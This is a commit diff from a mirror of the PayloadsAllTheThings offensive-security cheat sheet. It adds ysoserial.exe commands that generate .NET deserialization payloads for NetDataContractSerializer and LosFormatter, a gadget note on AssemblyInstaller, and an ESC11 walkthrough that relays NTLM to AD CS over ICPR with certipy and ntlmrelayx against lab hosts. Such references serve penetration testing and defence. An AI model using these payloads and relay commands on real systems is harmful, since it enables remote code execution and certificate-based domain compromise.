mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
ESC11 - Relay NTLM to ICPR
This commit is contained in:
parent
2ed3c03e78
commit
cbb2137f3b
@ -5,10 +5,12 @@
|
||||
* [Detection](#detection)
|
||||
* [Tools](#tools)
|
||||
* [Formatters](#formatters)
|
||||
* [XmlSerializer](#)
|
||||
* [DataContractSerializer](#)
|
||||
* [JSON.NET](#)
|
||||
* [BinaryFormatter](#)
|
||||
* [XmlSerializer](#xmlserializer)
|
||||
* [DataContractSerializer](#datacontractserializer)
|
||||
* [NetDataContractSerializer](#netdatacontractserializer)
|
||||
* [LosFormatter](#losformatter)
|
||||
* [JSON.NET](#jsonnet)
|
||||
* [BinaryFormatter](#binaryformatter)
|
||||
* [POP Gadgets](#pop-gadgets)
|
||||
* [References](#references)
|
||||
|
||||
@ -73,6 +75,8 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||
|
||||
### NetDataContractSerializer
|
||||
|
||||
> It extends the `System.Runtime.Serialization.XmlObjectSerializer` class and is capable of serializing any type annotated with serializable attribute as `BinaryFormatter`.
|
||||
|
||||
* In C# source code, look for `NetDataContractSerializer().ReadObject()`.
|
||||
* Payload output: **XML**
|
||||
|
||||
@ -80,6 +84,14 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||
.\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
|
||||
```
|
||||
|
||||
### LosFormatter
|
||||
|
||||
* Use `BinaryFormatter` internally.
|
||||
|
||||
```ps1
|
||||
.\ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
|
||||
```
|
||||
|
||||
|
||||
### JSON.NET
|
||||
|
||||
@ -132,6 +144,17 @@ List of popular gadgets used in common payloads.
|
||||
```cs
|
||||
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
|
||||
```
|
||||
* **System.Configuration.Install.AssemblyInstaller**
|
||||
* Execute payload with Assembly.Load
|
||||
```cs
|
||||
// System.Configuration.Install.AssemblyInstaller
|
||||
public void set_Path(string value){
|
||||
if (value == null){
|
||||
this.assembly = null;
|
||||
}
|
||||
this.assembly = Assembly.LoadFrom(value);
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
@ -85,6 +85,7 @@
|
||||
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||
- [ESC9 - No Security Extension](#esc9---no-security-extension)
|
||||
- [ESC11 - Relaying NTLM to ICPR](#esc11---relaying-ntlm-to-icpr)
|
||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||
- [Pass-The-Certificate](#pass-the-certificate)
|
||||
- [Active Directory Federation Services](#active-directory-federation-services)
|
||||
@ -2589,6 +2590,20 @@ Jane@corp.local is allowed to enroll in the certificate template ESC9 that speci
|
||||
# Add -domain <domain> to your command line since there is no domain specified in the certificate.
|
||||
```
|
||||
|
||||
#### ESC11 - Relaying NTLM to ICPR
|
||||
|
||||
> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue
|
||||
|
||||
Requirements:
|
||||
* [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork
|
||||
* [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork
|
||||
|
||||
Exploitation:
|
||||
1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output
|
||||
2. Setup a relay using Impacket ntlmrelay and trigger a connection to it.
|
||||
```ps1
|
||||
ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
|
||||
```
|
||||
|
||||
#### Certifried CVE-2022-26923
|
||||
|
||||
@ -4105,4 +4120,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
||||
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
|
||||
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
|
||||
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
|
||||
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
|
||||
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
|
Loading…
Reference in New Issue
Block a user